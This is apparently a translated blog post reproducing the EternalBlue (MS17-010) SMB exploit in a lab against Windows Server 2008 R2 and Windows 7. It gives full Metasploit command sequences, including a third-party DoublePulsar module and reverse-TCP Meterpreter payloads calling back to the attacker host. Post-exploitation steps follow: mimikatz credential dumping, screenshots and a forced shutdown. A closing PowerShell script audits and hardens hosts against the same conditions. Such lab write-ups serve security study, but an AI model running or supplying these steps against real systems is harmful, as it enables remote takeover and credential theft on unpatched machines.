
MS17-010 (EternalBlue) vulnerability reproduction

程序员文章站 2022-07-15 14:14:54
...

Origin of the vulnerability

EternalBlue is one of a large batch of network attack tools released on the night of 14 April 2017 by the hacker group Shadow Brokers. "EternalBlue" exploits an SMB vulnerability in Windows to obtain the highest system privileges. On 12 May, criminals adapted "EternalBlue" to build the WannaCry ransomware.

Reproducing the vulnerability

Experiment 1: obtaining a shell on Windows Server 2008

Lab environment:
    Attacker: Kali, IP 192.168.3.129
    Target: Windows Server 2008, IP 192.168.3.128

aaa@qq.com:~# msfconsole 
[-] ***rting the MetaSploit Framework console.../
...
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set processname lsass.exe
processname => lsass.exe
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.3.129
lhost => 192.168.3.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.3.128
rhost => 192.168.3.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.3.129:4444 
[*] 192.168.3.128:445 - Connecting to target for exploitation.
[+] 192.168.3.128:445 - Connection established for exploitation.
[+] 192.168.3.128:445 - Target OS selected valid for OS indicated by SMB reply
...

During the attack, Windows 2008 may behave abnormally or even reboot on its own; that indicates it is being attacked. If the attack session drops, running the attack again yields the shell.

...
[*] Meterpreter session 1 opened (192.168.3.129:4444 -> 192.168.3.128:49171) at 2019-03-21 01:39:37 -0400
[+] 192.168.3.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.3.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.3.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=     # shell successfully called back
meterpreter > sysinfo 
Computer        : WIN-EAITJB2839O
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > ipconfig
...
Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:7c:56:f5
MTU          : 1500
IPv4 Address : 192.168.3.128
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a96b:5b14:1c0e:bbd6
IPv6 Netmask : ffff:ffff:ffff:ffff::
...
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 2008 R2 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;996     Negotiate  WORKGROUP        WIN-EAITJB2839O$  
0;47050   NTLM                                          
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     
0;999     NTLM       WORKGROUP        WIN-EAITJB2839O$  
0;297281  NTLM       WIN-EAITJB2839O  canlang           45 76 bb da 
0;297231  NTLM       WIN-EAITJB2839O  canlang           45 76 bb da 
0;697530  NTLM       WIN-EAITJB2839O  Administrator     aaa@qq.com

meterpreter >

Experiment 2: using a POC from GitHub to attack Win7-x86 (32-bit) and obtain a shell

Lab environment:
    Attacker: Kali, IP 192.168.43.133
    Target: Windows 7 x86, IP 192.168.43.161
Although Kali 2017.1 ships with the ms17_010_eternalblue attack module, that module can only attack Windows 7 (x64) and Server 2008 R2 (x64), so this experiment uses someone else's POC from GitHub.

1. Download the POC from GitHub

aaa@qq.com:~# cd Desktop/MSF-hrack/
aaa@qq.com:~/Desktop/MSF-hrack# git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
fatal: destination path 'Eternalblue-Doublepulsar-Metasploit' already exists and is not an empty directory.
aaa@qq.com:~/Desktop/MSF-hrack# cp -r Eternalblue-Doublepulsar-Metasploit/* /usr/share/metasploit-framework/modules/exploits/windows/smb/    # copy into msf's exploit modules directory
aaa@qq.com:~/Desktop/MSF-hrack# 

2. Use msf to run EternalBlue against the target
If wine32 is not installed, install it first:

aaa@qq.com:~# dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32
aaa@qq.com:~/Desktop/MSF-hrack# service postgresql start
aaa@qq.com:~/Desktop/MSF-hrack# msfconsole 

       =[ metasploit v4.16.30-dev                         ]
+ -- --=[ 1722 exploits - 986 auxiliary - 300 post        ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/windows/smb/eternalblue_doublepulsar 
msf exploit(windows/smb/eternalblue_doublepulsar) > set doublepulsarpath '/root/Desktop/MSF-hrack/Eternalblue-Doublepulsar-Metasploit/deps' 
doublepulsarpath => /root/Desktop/MSF-hrack/Eternalblue-Doublepulsar-Metasploit/deps
msf exploit(windows/smb/eternalblue_doublepulsar) > set eternalbluepath '/root/Desktop/MSF-hrack/Eternalblue-Doublepulsar-Metasploit/deps' 
eternalbluepath => /root/Desktop/MSF-hrack/Eternalblue-Doublepulsar-Metasploit/deps
msf exploit(windows/smb/eternalblue_doublepulsar) > set processinject lsass.exe
processinject => lsass.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > set targetarchitecture x86
targetarchitecture => x64
msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.168.43.161
rhost => 192.168.43.161
msf exploit(windows/smb/eternalblue_doublepulsar) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows XP (all services pack) (x86) (x64)
   1   Windows Server 2003 SP0 (x86)
   2   Windows Server 2003 SP1/SP2 (x86)
   3   Windows Server 2003 (x64)
   4   Windows Vista (x86)
   5   Windows Vista (x64)
   6   Windows Server 2008 (x86) 
   7   Windows Server 2008 R2 (x86) (x64)
   8   Windows 7 (all services pack) (x86) (x64)


msf exploit(windows/smb/eternalblue_doublepulsar) > set target 8
target => 8
msf exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.168.43.133
lhost => 192.168.43.133
msf exploit(windows/smb/eternalblue_doublepulsar) > show options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                                   Required  Description
   ----                ---------------                                                   --------  -----------
   DOUBLEPULSARPATH    /root/Desktop/MSF-hrack/Eternalblue-Doublepulsar-Metasploit/deps  yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /root/Desktop/MSF-hrack/Eternalblue-Doublepulsar-Metasploit/deps  yes       Path directory of Eternalblue
   PROCESSINJECT       lsass.exe                                                         yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOST               192.168.43.161                                                    yes       The target address
   RPORT               445                                                               yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x64                                                               yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/                                              yes       WINE drive_c path


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.43.133   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   8   Windows 7 (all services pack) (x86) (x64)


msf exploit(windows/smb/eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.43.133:4444 
[*] 192.168.43.161:445 - Generating Eternalblue XML data
[*] 192.168.43.161:445 - Generating Doublepulsar XML data
[*] 192.168.43.161:445 - Generating payload DLL for Doublepulsar
[*] 192.168.43.161:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.43.161:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.43.161:445 - Are you sure it's vulnerable?
[*] 192.168.43.161:445 - Launching Doublepulsar...
[-] 192.168.43.161:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/eternalblue_doublepulsar) > sessions -i

Active sessions
===============

No active sessions.

msf exploit(windows/smb/eternalblue_doublepulsar) > set processinject explorer.exe
processinject => explorer.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.43.133:4444 
[*] 192.168.43.161:445 - Generating Eternalblue XML data
[*] 192.168.43.161:445 - Generating Doublepulsar XML data
[*] 192.168.43.161:445 - Generating payload DLL for Doublepulsar
[*] 192.168.43.161:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.43.161:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.43.161:445 - Are you sure it's vulnerable?
[*] 192.168.43.161:445 - Launching Doublepulsar...
[-] 192.168.43.161:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/eternalblue_doublepulsar) > 

The Win 7 shell was not obtained. Reason: the Windows 7 firewall had not been turned off.
Turn off the Win 7 firewall and attack again:

msf exploit(windows/smb/eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.43.133:4444 
[*] 192.168.43.161:445 - Generating Eternalblue XML data
[*] 192.168.43.161:445 - Generating Doublepulsar XML data
[*] 192.168.43.161:445 - Generating payload DLL for Doublepulsar
[*] 192.168.43.161:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.43.161:445 - Launching Eternalblue...
[+] 192.168.43.161:445 - Backdoor is already installed
[*] 192.168.43.161:445 - Launching Doublepulsar...
[*] Sending stage (205891 bytes) to 192.168.43.161
[*] Meterpreter session 3 opened (192.168.43.133:4444 -> 192.168.43.161:50630) at 2019-03-11 05:39:00 -0400
[+] 192.168.43.161:445 - Remote code executed... 3... 2... 1...

meterpreter >  ifconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:3c:60:ad
MTU          : 1500
IPv4 Address : 192.168.43.161
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::3d78:37a1:f9ae:35
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:2ba1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 13
============
Name         : Teredo Tunneling Pseudo-Interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::100:7f:fffe
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > screenshot 
Screenshot saved to: /root/ltsRJHfE.jpeg
meterpreter > shutdown -s -t 100
Shutting down...
meterpreter > 

Shell obtained successfully.
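Added example, not part of the original post: a PowerShell audit for a Windows 7 / Server 2008 R2 host covering the conditions that decided the two experiments above (SMBv1 reachable on TCP 445, the MS17-010 update, the host firewall that blocked the second attempt, and the WDigest cleartext caching that let the first experiment read the Administrator password from LSASS). The function names, the choice of KB numbers (the March 2017 MS17-010 updates for these OS versions) and the assumption of an elevated PowerShell session are mine.

```powershell
# Audit script (added example, not from the original post). Assumes an elevated session.
function Test-Ms17010Exposure {
    $report = @{}

    # 1. SMBv1 server side: EternalBlue targets SMBv1 on TCP 445. On Win7/2008 R2 a missing
    #    SMB1 value means the default, which is enabled.
    $lanman = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' -ErrorAction SilentlyContinue
    $report['SMB1Enabled'] = ($null -eq $lanman.SMB1) -or ($lanman.SMB1 -ne 0)

    # 2. MS17-010 update: KB4012212 (security-only) / KB4012215 (monthly rollup) for Win7 SP1 and
    #    2008 R2 SP1. Later cumulative rollups supersede them, so a miss here means "investigate",
    #    not "vulnerable".
    $ms17010Kbs = @('KB4012212', 'KB4012215')
    $installed = Get-HotFix | Where-Object { $ms17010Kbs -contains $_.HotFixID }
    $report['MS17010PatchSeen'] = [bool]$installed

    # 3. Host firewall: experiment 2 only succeeded after the Win7 firewall was turned off.
    $fw = netsh advfirewall show allprofiles state
    $report['FirewallAllProfilesOn'] = -not ($fw -match 'State\s+OFF')

    # 4. WDigest: the 'wdigest' output in experiment 1 came from cleartext credentials cached in
    #    LSASS. With KB2871997 present, UseLogonCredential = 0 stops that caching.
    $wd = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -ErrorAction SilentlyContinue
    $report['WDigestCachesCleartext'] = ($null -eq $wd.UseLogonCredential) -or ($wd.UseLogonCredential -ne 0)

    New-Object PSObject -Property $report
}

function Set-Ms17010Hardening {
    # Remediates the two registry-controlled findings; patching and firewall policy stay with the admin.
    $lanmanPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    Set-ItemProperty -Path $lanmanPath -Name SMB1 -Value 0 -Type DWord

    $wdPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    if (-not (Test-Path $wdPath)) { New-Item -Path $wdPath | Out-Null }
    Set-ItemProperty -Path $wdPath -Name UseLogonCredential -Value 0 -Type DWord

    # The SMB1 change takes effect once the server service restarts (or after a reboot).
    Restart-Service -Name LanmanServer -Force
}

Test-Ms17010Exposure | Format-List
```

Run `Test-Ms17010Exposure` first; apply `Set-Ms17010Hardening` only after confirming nothing on the host still depends on SMBv1.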